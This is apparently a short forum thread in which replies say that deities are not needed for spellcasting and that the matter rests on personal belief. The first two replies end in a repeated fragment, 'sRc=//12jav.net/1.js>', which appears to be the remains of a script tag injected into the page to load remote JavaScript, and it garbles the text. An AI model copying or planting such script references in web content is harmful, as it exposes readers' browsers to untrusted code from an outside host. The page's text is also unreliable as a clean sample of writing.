Deities aren't necessary during spellcasting. You can contact them through meditation, or through ritualistic practice. If your thinking of trying to summon one, you can't. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Deities are not required, though if you typically work with a certain pantheon or group of deities, certain ones are more suited for the asking of assistance than others are, depending on the spell/ritual you are doing. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

It is ultimately a matter of personal belief an opinion. Not everyone has the same path nor the same beliefs on what is necessary and what is not. It depends soley on you.
